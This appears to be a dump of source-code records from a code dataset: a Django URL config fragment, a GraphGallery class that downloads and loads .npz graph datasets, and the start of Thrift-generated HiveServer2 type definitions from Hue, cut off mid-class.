from django.conf.urls.static import static
urlpatterns = [
path('', include('business.urls')),
path('employee/', include('employee.urls')),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
bf63fe697c539ec382672dc75ea18cf93dae240b | 71d4cc88c68f957a37a2db8234f8178ad2c1c769 | /graphgallery/data/npz_dataset.py | 8e769181796d82f0fa694a5ba370dd41a5b82c3e | [
"MIT"
] | permissive | MLDL/GraphGallery | 3159e0b8ddb1d2fa6b7cea4a27ba075f97db0a03 | 2474622286f135ca693c62981f5a4c4b31bcd2e6 | refs/heads/master | 2022-12-28T03:03:48.516408 | 2020-09-26T16:08:05 | 2020-09-26T16:08:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,080 | py | import os
import zipfile
import os.path as osp
import numpy as np
from graphgallery.data import Dataset
from graphgallery.data.io import makedirs, files_exist, download_file
from graphgallery.data.graph import Graph, load_dataset
_DATASETS = ('citeseer', 'cora', 'cora_ml', 'cora_full', 'amazon_cs', 'amazon_photo',
'coauthor_cs', 'coauthor_phy', 'polblogs', 'pubmed', 'flickr', 'flickr_sdm', 'blogcatalog')
class NPZDataset(Dataset):
    """A graph dataset backed by a single ``<name>.npz`` archive.

    Known dataset names are fetched from the GraphData GitHub repository
    on first use; any other name is treated as a custom dataset and must
    be reachable through the ``url`` argument.
    """

    github_url = "https://raw.githubusercontent.com/EdisonLeeeee/GraphData/master/datasets/npz/{}.npz"
    supported_datasets = _DATASETS

    def __init__(self, name, root=None, url=None, standardize=False, verbose=True):
        """Download the archive if necessary and load it into ``self.graph``.

        Parameters
        ----------
        name : str
            Dataset name; one of ``supported_datasets`` or a custom name.
        root : str, optional
            Root directory for downloaded files (resolved by the base class).
        url : str, optional
            Explicit download URL overriding the GitHub default.
        standardize : bool
            If True, apply ``standardize()`` to the graph after loading.
        verbose : bool
            Print per-file progress information.
        """
        if name.lower() not in self.supported_datasets:
            print(f"Dataset not Found. Using custom dataset: {name}.\n")
        super().__init__(name, root, verbose)
        self._url = url
        self.download_dir = osp.join(self.root, "npz")
        self.standardize = standardize
        makedirs(self.download_dir)
        self.download()
        self.process()

    def download(self):
        """Fetch the ``.npz`` archive unless it is already on disk."""
        if files_exist(self.raw_paths):
            print("Downloaded dataset files already exist.")
            if self.verbose:
                self.print_files(self.raw_paths)
            return
        self.print_files(self.raw_paths)
        print("Downloading...")
        download_file(self.raw_paths, self.urls)
        if self.verbose:
            self.print_files(self.raw_paths)
        print("Downloading completed.")

    def process(self):
        """Load the graph, drop self-loops, symmetrize, and optionally standardize."""
        print("Processing...")
        graph = load_dataset(
            self.raw_paths[0]).eliminate_selfloops().to_undirected()
        if self.standardize:
            graph = graph.standardize()
        self.graph = graph
        print("Processing completed.")

    @property
    def url(self):
        # An explicitly supplied URL wins; otherwise derive one from the name.
        if isinstance(self._url, str):
            return self._url
        return self.github_url.format(self.name)

    @property
    def raw_paths(self):
        # Single-file dataset: <download_dir>/<name>.npz
        return [f"{osp.join(self.download_dir, self.name)}.npz"]
| [
"[email protected]"
] | |
2f3dc9b1091c9ce8bf8b3f455db007cea527544b | f55ed49e77f2983f9118a5228a0f6d777c4eac97 | /apps/beeswax/gen-py/TCLIService/ttypes.py | 78d1609bf3c6ecb2180d62fcf47162e7936e3d04 | [
"Apache-2.0"
] | permissive | mravi/hue | feb8543e1490fdbfdaff069c021ae168f72b28c6 | 1190bc41c560edf239c5dfc9689d25f3b4b3ab95 | refs/heads/master | 2020-12-25T21:55:41.294305 | 2013-11-07T11:49:05 | 2013-11-08T01:36:42 | 14,227,040 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | true | 169,041 | py | #
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class TProtocolVersion(object):
  """Thrift-generated enum of HiveServer2 CLI protocol versions (do not hand-edit values)."""
  HIVE_CLI_SERVICE_PROTOCOL_V1 = 0
  HIVE_CLI_SERVICE_PROTOCOL_V2 = 1
  _VALUES_TO_NAMES = {
    0: "HIVE_CLI_SERVICE_PROTOCOL_V1",
    1: "HIVE_CLI_SERVICE_PROTOCOL_V2",
  }
  _NAMES_TO_VALUES = {
    "HIVE_CLI_SERVICE_PROTOCOL_V1": 0,
    "HIVE_CLI_SERVICE_PROTOCOL_V2": 1,
  }
class TTypeId(object):
  """Thrift-generated enum of HiveServer2 column type identifiers."""
  BOOLEAN_TYPE = 0
  TINYINT_TYPE = 1
  SMALLINT_TYPE = 2
  INT_TYPE = 3
  BIGINT_TYPE = 4
  FLOAT_TYPE = 5
  DOUBLE_TYPE = 6
  STRING_TYPE = 7
  TIMESTAMP_TYPE = 8
  BINARY_TYPE = 9
  ARRAY_TYPE = 10
  MAP_TYPE = 11
  STRUCT_TYPE = 12
  UNION_TYPE = 13
  USER_DEFINED_TYPE = 14
  DECIMAL_TYPE = 15
  NULL_TYPE = 16
  DATE_TYPE = 17
  _VALUES_TO_NAMES = {
    0: "BOOLEAN_TYPE",
    1: "TINYINT_TYPE",
    2: "SMALLINT_TYPE",
    3: "INT_TYPE",
    4: "BIGINT_TYPE",
    5: "FLOAT_TYPE",
    6: "DOUBLE_TYPE",
    7: "STRING_TYPE",
    8: "TIMESTAMP_TYPE",
    9: "BINARY_TYPE",
    10: "ARRAY_TYPE",
    11: "MAP_TYPE",
    12: "STRUCT_TYPE",
    13: "UNION_TYPE",
    14: "USER_DEFINED_TYPE",
    15: "DECIMAL_TYPE",
    16: "NULL_TYPE",
    17: "DATE_TYPE",
  }
  _NAMES_TO_VALUES = {
    "BOOLEAN_TYPE": 0,
    "TINYINT_TYPE": 1,
    "SMALLINT_TYPE": 2,
    "INT_TYPE": 3,
    "BIGINT_TYPE": 4,
    "FLOAT_TYPE": 5,
    "DOUBLE_TYPE": 6,
    "STRING_TYPE": 7,
    "TIMESTAMP_TYPE": 8,
    "BINARY_TYPE": 9,
    "ARRAY_TYPE": 10,
    "MAP_TYPE": 11,
    "STRUCT_TYPE": 12,
    "UNION_TYPE": 13,
    "USER_DEFINED_TYPE": 14,
    "DECIMAL_TYPE": 15,
    "NULL_TYPE": 16,
    "DATE_TYPE": 17,
  }
class TStatusCode(object):
  """Thrift-generated enum of RPC status codes returned in TStatus."""
  SUCCESS_STATUS = 0
  SUCCESS_WITH_INFO_STATUS = 1
  STILL_EXECUTING_STATUS = 2
  ERROR_STATUS = 3
  INVALID_HANDLE_STATUS = 4
  _VALUES_TO_NAMES = {
    0: "SUCCESS_STATUS",
    1: "SUCCESS_WITH_INFO_STATUS",
    2: "STILL_EXECUTING_STATUS",
    3: "ERROR_STATUS",
    4: "INVALID_HANDLE_STATUS",
  }
  _NAMES_TO_VALUES = {
    "SUCCESS_STATUS": 0,
    "SUCCESS_WITH_INFO_STATUS": 1,
    "STILL_EXECUTING_STATUS": 2,
    "ERROR_STATUS": 3,
    "INVALID_HANDLE_STATUS": 4,
  }
class TOperationState(object):
  """Thrift-generated enum of server-side operation lifecycle states."""
  INITIALIZED_STATE = 0
  RUNNING_STATE = 1
  FINISHED_STATE = 2
  CANCELED_STATE = 3
  CLOSED_STATE = 4
  ERROR_STATE = 5
  UKNOWN_STATE = 6  # sic -- misspelling originates in the IDL; kept for compatibility
  PENDING_STATE = 7
  _VALUES_TO_NAMES = {
    0: "INITIALIZED_STATE",
    1: "RUNNING_STATE",
    2: "FINISHED_STATE",
    3: "CANCELED_STATE",
    4: "CLOSED_STATE",
    5: "ERROR_STATE",
    6: "UKNOWN_STATE",
    7: "PENDING_STATE",
  }
  _NAMES_TO_VALUES = {
    "INITIALIZED_STATE": 0,
    "RUNNING_STATE": 1,
    "FINISHED_STATE": 2,
    "CANCELED_STATE": 3,
    "CLOSED_STATE": 4,
    "ERROR_STATE": 5,
    "UKNOWN_STATE": 6,
    "PENDING_STATE": 7,
  }
class TOperationType(object):
  """Thrift-generated enum identifying the kind of a server operation."""
  EXECUTE_STATEMENT = 0
  GET_TYPE_INFO = 1
  GET_CATALOGS = 2
  GET_SCHEMAS = 3
  GET_TABLES = 4
  GET_TABLE_TYPES = 5
  GET_COLUMNS = 6
  GET_FUNCTIONS = 7
  UNKNOWN = 8
  _VALUES_TO_NAMES = {
    0: "EXECUTE_STATEMENT",
    1: "GET_TYPE_INFO",
    2: "GET_CATALOGS",
    3: "GET_SCHEMAS",
    4: "GET_TABLES",
    5: "GET_TABLE_TYPES",
    6: "GET_COLUMNS",
    7: "GET_FUNCTIONS",
    8: "UNKNOWN",
  }
  _NAMES_TO_VALUES = {
    "EXECUTE_STATEMENT": 0,
    "GET_TYPE_INFO": 1,
    "GET_CATALOGS": 2,
    "GET_SCHEMAS": 3,
    "GET_TABLES": 4,
    "GET_TABLE_TYPES": 5,
    "GET_COLUMNS": 6,
    "GET_FUNCTIONS": 7,
    "UNKNOWN": 8,
  }
class TGetInfoType(object):
  """Thrift-generated enum of GetInfo keys (ODBC/CLI-style server metadata probes).

  The non-contiguous numeric values mirror the corresponding CLI constants.
  """
  CLI_MAX_DRIVER_CONNECTIONS = 0
  CLI_MAX_CONCURRENT_ACTIVITIES = 1
  CLI_DATA_SOURCE_NAME = 2
  CLI_FETCH_DIRECTION = 8
  CLI_SERVER_NAME = 13
  CLI_SEARCH_PATTERN_ESCAPE = 14
  CLI_DBMS_NAME = 17
  CLI_DBMS_VER = 18
  CLI_ACCESSIBLE_TABLES = 19
  CLI_ACCESSIBLE_PROCEDURES = 20
  CLI_CURSOR_COMMIT_BEHAVIOR = 23
  CLI_DATA_SOURCE_READ_ONLY = 25
  CLI_DEFAULT_TXN_ISOLATION = 26
  CLI_IDENTIFIER_CASE = 28
  CLI_IDENTIFIER_QUOTE_CHAR = 29
  CLI_MAX_COLUMN_NAME_LEN = 30
  CLI_MAX_CURSOR_NAME_LEN = 31
  CLI_MAX_SCHEMA_NAME_LEN = 32
  CLI_MAX_CATALOG_NAME_LEN = 34
  CLI_MAX_TABLE_NAME_LEN = 35
  CLI_SCROLL_CONCURRENCY = 43
  CLI_TXN_CAPABLE = 46
  CLI_USER_NAME = 47
  CLI_TXN_ISOLATION_OPTION = 72
  CLI_INTEGRITY = 73
  CLI_GETDATA_EXTENSIONS = 81
  CLI_NULL_COLLATION = 85
  CLI_ALTER_TABLE = 86
  CLI_ORDER_BY_COLUMNS_IN_SELECT = 90
  CLI_SPECIAL_CHARACTERS = 94
  CLI_MAX_COLUMNS_IN_GROUP_BY = 97
  CLI_MAX_COLUMNS_IN_INDEX = 98
  CLI_MAX_COLUMNS_IN_ORDER_BY = 99
  CLI_MAX_COLUMNS_IN_SELECT = 100
  CLI_MAX_COLUMNS_IN_TABLE = 101
  CLI_MAX_INDEX_SIZE = 102
  CLI_MAX_ROW_SIZE = 104
  CLI_MAX_STATEMENT_LEN = 105
  CLI_MAX_TABLES_IN_SELECT = 106
  CLI_MAX_USER_NAME_LEN = 107
  CLI_OJ_CAPABILITIES = 115
  CLI_XOPEN_CLI_YEAR = 10000
  CLI_CURSOR_SENSITIVITY = 10001
  CLI_DESCRIBE_PARAMETER = 10002
  CLI_CATALOG_NAME = 10003
  CLI_COLLATION_SEQ = 10004
  CLI_MAX_IDENTIFIER_LEN = 10005
  _VALUES_TO_NAMES = {
    0: "CLI_MAX_DRIVER_CONNECTIONS",
    1: "CLI_MAX_CONCURRENT_ACTIVITIES",
    2: "CLI_DATA_SOURCE_NAME",
    8: "CLI_FETCH_DIRECTION",
    13: "CLI_SERVER_NAME",
    14: "CLI_SEARCH_PATTERN_ESCAPE",
    17: "CLI_DBMS_NAME",
    18: "CLI_DBMS_VER",
    19: "CLI_ACCESSIBLE_TABLES",
    20: "CLI_ACCESSIBLE_PROCEDURES",
    23: "CLI_CURSOR_COMMIT_BEHAVIOR",
    25: "CLI_DATA_SOURCE_READ_ONLY",
    26: "CLI_DEFAULT_TXN_ISOLATION",
    28: "CLI_IDENTIFIER_CASE",
    29: "CLI_IDENTIFIER_QUOTE_CHAR",
    30: "CLI_MAX_COLUMN_NAME_LEN",
    31: "CLI_MAX_CURSOR_NAME_LEN",
    32: "CLI_MAX_SCHEMA_NAME_LEN",
    34: "CLI_MAX_CATALOG_NAME_LEN",
    35: "CLI_MAX_TABLE_NAME_LEN",
    43: "CLI_SCROLL_CONCURRENCY",
    46: "CLI_TXN_CAPABLE",
    47: "CLI_USER_NAME",
    72: "CLI_TXN_ISOLATION_OPTION",
    73: "CLI_INTEGRITY",
    81: "CLI_GETDATA_EXTENSIONS",
    85: "CLI_NULL_COLLATION",
    86: "CLI_ALTER_TABLE",
    90: "CLI_ORDER_BY_COLUMNS_IN_SELECT",
    94: "CLI_SPECIAL_CHARACTERS",
    97: "CLI_MAX_COLUMNS_IN_GROUP_BY",
    98: "CLI_MAX_COLUMNS_IN_INDEX",
    99: "CLI_MAX_COLUMNS_IN_ORDER_BY",
    100: "CLI_MAX_COLUMNS_IN_SELECT",
    101: "CLI_MAX_COLUMNS_IN_TABLE",
    102: "CLI_MAX_INDEX_SIZE",
    104: "CLI_MAX_ROW_SIZE",
    105: "CLI_MAX_STATEMENT_LEN",
    106: "CLI_MAX_TABLES_IN_SELECT",
    107: "CLI_MAX_USER_NAME_LEN",
    115: "CLI_OJ_CAPABILITIES",
    10000: "CLI_XOPEN_CLI_YEAR",
    10001: "CLI_CURSOR_SENSITIVITY",
    10002: "CLI_DESCRIBE_PARAMETER",
    10003: "CLI_CATALOG_NAME",
    10004: "CLI_COLLATION_SEQ",
    10005: "CLI_MAX_IDENTIFIER_LEN",
  }
  _NAMES_TO_VALUES = {
    "CLI_MAX_DRIVER_CONNECTIONS": 0,
    "CLI_MAX_CONCURRENT_ACTIVITIES": 1,
    "CLI_DATA_SOURCE_NAME": 2,
    "CLI_FETCH_DIRECTION": 8,
    "CLI_SERVER_NAME": 13,
    "CLI_SEARCH_PATTERN_ESCAPE": 14,
    "CLI_DBMS_NAME": 17,
    "CLI_DBMS_VER": 18,
    "CLI_ACCESSIBLE_TABLES": 19,
    "CLI_ACCESSIBLE_PROCEDURES": 20,
    "CLI_CURSOR_COMMIT_BEHAVIOR": 23,
    "CLI_DATA_SOURCE_READ_ONLY": 25,
    "CLI_DEFAULT_TXN_ISOLATION": 26,
    "CLI_IDENTIFIER_CASE": 28,
    "CLI_IDENTIFIER_QUOTE_CHAR": 29,
    "CLI_MAX_COLUMN_NAME_LEN": 30,
    "CLI_MAX_CURSOR_NAME_LEN": 31,
    "CLI_MAX_SCHEMA_NAME_LEN": 32,
    "CLI_MAX_CATALOG_NAME_LEN": 34,
    "CLI_MAX_TABLE_NAME_LEN": 35,
    "CLI_SCROLL_CONCURRENCY": 43,
    "CLI_TXN_CAPABLE": 46,
    "CLI_USER_NAME": 47,
    "CLI_TXN_ISOLATION_OPTION": 72,
    "CLI_INTEGRITY": 73,
    "CLI_GETDATA_EXTENSIONS": 81,
    "CLI_NULL_COLLATION": 85,
    "CLI_ALTER_TABLE": 86,
    "CLI_ORDER_BY_COLUMNS_IN_SELECT": 90,
    "CLI_SPECIAL_CHARACTERS": 94,
    "CLI_MAX_COLUMNS_IN_GROUP_BY": 97,
    "CLI_MAX_COLUMNS_IN_INDEX": 98,
    "CLI_MAX_COLUMNS_IN_ORDER_BY": 99,
    "CLI_MAX_COLUMNS_IN_SELECT": 100,
    "CLI_MAX_COLUMNS_IN_TABLE": 101,
    "CLI_MAX_INDEX_SIZE": 102,
    "CLI_MAX_ROW_SIZE": 104,
    "CLI_MAX_STATEMENT_LEN": 105,
    "CLI_MAX_TABLES_IN_SELECT": 106,
    "CLI_MAX_USER_NAME_LEN": 107,
    "CLI_OJ_CAPABILITIES": 115,
    "CLI_XOPEN_CLI_YEAR": 10000,
    "CLI_CURSOR_SENSITIVITY": 10001,
    "CLI_DESCRIBE_PARAMETER": 10002,
    "CLI_CATALOG_NAME": 10003,
    "CLI_COLLATION_SEQ": 10004,
    "CLI_MAX_IDENTIFIER_LEN": 10005,
  }
class TFetchOrientation(object):
  """Thrift-generated enum of result-set fetch directions."""
  FETCH_NEXT = 0
  FETCH_PRIOR = 1
  FETCH_RELATIVE = 2
  FETCH_ABSOLUTE = 3
  FETCH_FIRST = 4
  FETCH_LAST = 5
  _VALUES_TO_NAMES = {
    0: "FETCH_NEXT",
    1: "FETCH_PRIOR",
    2: "FETCH_RELATIVE",
    3: "FETCH_ABSOLUTE",
    4: "FETCH_FIRST",
    5: "FETCH_LAST",
  }
  _NAMES_TO_VALUES = {
    "FETCH_NEXT": 0,
    "FETCH_PRIOR": 1,
    "FETCH_RELATIVE": 2,
    "FETCH_ABSOLUTE": 3,
    "FETCH_FIRST": 4,
    "FETCH_LAST": 5,
  }
class TPrimitiveTypeEntry(object):
  """
  Type entry for a primitive (non-parameterized) type.

  Attributes:
   - type: a TTypeId value identifying the primitive type
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'type', None, None, ), # 1
  )

  def __init__(self, type=None,):
    self.type = type

  def read(self, iprot):
    # fast path: delegate to the C extension when the accelerated binary
    # protocol and a compatible transport are available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.type = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        # unknown fields are skipped for forward compatibility
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # fast path mirrors read(): encode via the C extension when possible
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPrimitiveTypeEntry')
    if self.type is not None:
      oprot.writeFieldBegin('type', TType.I32, 1)
      oprot.writeI32(self.type)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.type is None:
      raise TProtocol.TProtocolException(message='Required field type is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TArrayTypeEntry(object):
  """
  Type entry for an ARRAY type.

  Attributes:
   - objectTypePtr: i32 index of the element type
     (appears to index into the enclosing TTypeDesc.types list -- confirm against the IDL)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'objectTypePtr', None, None, ), # 1
  )

  def __init__(self, objectTypePtr=None,):
    self.objectTypePtr = objectTypePtr

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.objectTypePtr = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TArrayTypeEntry')
    if self.objectTypePtr is not None:
      oprot.writeFieldBegin('objectTypePtr', TType.I32, 1)
      oprot.writeI32(self.objectTypePtr)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.objectTypePtr is None:
      raise TProtocol.TProtocolException(message='Required field objectTypePtr is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TMapTypeEntry(object):
  """
  Type entry for a MAP type.

  Attributes:
   - keyTypePtr: i32 index of the key type
   - valueTypePtr: i32 index of the value type
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'keyTypePtr', None, None, ), # 1
    (2, TType.I32, 'valueTypePtr', None, None, ), # 2
  )

  def __init__(self, keyTypePtr=None, valueTypePtr=None,):
    self.keyTypePtr = keyTypePtr
    self.valueTypePtr = valueTypePtr

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.keyTypePtr = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.valueTypePtr = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TMapTypeEntry')
    if self.keyTypePtr is not None:
      oprot.writeFieldBegin('keyTypePtr', TType.I32, 1)
      oprot.writeI32(self.keyTypePtr)
      oprot.writeFieldEnd()
    if self.valueTypePtr is not None:
      oprot.writeFieldBegin('valueTypePtr', TType.I32, 2)
      oprot.writeI32(self.valueTypePtr)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.keyTypePtr is None:
      raise TProtocol.TProtocolException(message='Required field keyTypePtr is unset!')
    if self.valueTypePtr is None:
      raise TProtocol.TProtocolException(message='Required field valueTypePtr is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TStructTypeEntry(object):
  """
  Type entry for a STRUCT type.

  Attributes:
   - nameToTypePtr: map of field name -> i32 index of the field's type
  """

  thrift_spec = (
    None, # 0
    (1, TType.MAP, 'nameToTypePtr', (TType.STRING,None,TType.I32,None), None, ), # 1
  )

  def __init__(self, nameToTypePtr=None,):
    self.nameToTypePtr = nameToTypePtr

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.MAP:
          self.nameToTypePtr = {}
          (_ktype1, _vtype2, _size0 ) = iprot.readMapBegin()
          for _i4 in xrange(_size0):
            _key5 = iprot.readString();
            _val6 = iprot.readI32();
            self.nameToTypePtr[_key5] = _val6
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TStructTypeEntry')
    if self.nameToTypePtr is not None:
      oprot.writeFieldBegin('nameToTypePtr', TType.MAP, 1)
      oprot.writeMapBegin(TType.STRING, TType.I32, len(self.nameToTypePtr))
      for kiter7,viter8 in self.nameToTypePtr.items():
        oprot.writeString(kiter7)
        oprot.writeI32(viter8)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.nameToTypePtr is None:
      raise TProtocol.TProtocolException(message='Required field nameToTypePtr is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TUnionTypeEntry(object):
  """
  Type entry for a UNION type.

  Attributes:
   - nameToTypePtr: map of member name -> i32 index of the member's type
  """

  thrift_spec = (
    None, # 0
    (1, TType.MAP, 'nameToTypePtr', (TType.STRING,None,TType.I32,None), None, ), # 1
  )

  def __init__(self, nameToTypePtr=None,):
    self.nameToTypePtr = nameToTypePtr

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.MAP:
          self.nameToTypePtr = {}
          (_ktype10, _vtype11, _size9 ) = iprot.readMapBegin()
          for _i13 in xrange(_size9):
            _key14 = iprot.readString();
            _val15 = iprot.readI32();
            self.nameToTypePtr[_key14] = _val15
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TUnionTypeEntry')
    if self.nameToTypePtr is not None:
      oprot.writeFieldBegin('nameToTypePtr', TType.MAP, 1)
      oprot.writeMapBegin(TType.STRING, TType.I32, len(self.nameToTypePtr))
      for kiter16,viter17 in self.nameToTypePtr.items():
        oprot.writeString(kiter16)
        oprot.writeI32(viter17)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.nameToTypePtr is None:
      raise TProtocol.TProtocolException(message='Required field nameToTypePtr is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TUserDefinedTypeEntry(object):
  """
  Type entry for a user-defined type.

  Attributes:
   - typeClassName: name of the class implementing the type
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'typeClassName', None, None, ), # 1
  )

  def __init__(self, typeClassName=None,):
    self.typeClassName = typeClassName

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.typeClassName = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TUserDefinedTypeEntry')
    if self.typeClassName is not None:
      oprot.writeFieldBegin('typeClassName', TType.STRING, 1)
      oprot.writeString(self.typeClassName)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.typeClassName is None:
      raise TProtocol.TProtocolException(message='Required field typeClassName is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TTypeEntry(object):
  """
  Union-style wrapper over the concrete type-entry structs; by convention
  exactly one of the fields is set (not enforced by validate()).

  Attributes:
   - primitiveEntry
   - arrayEntry
   - mapEntry
   - structEntry
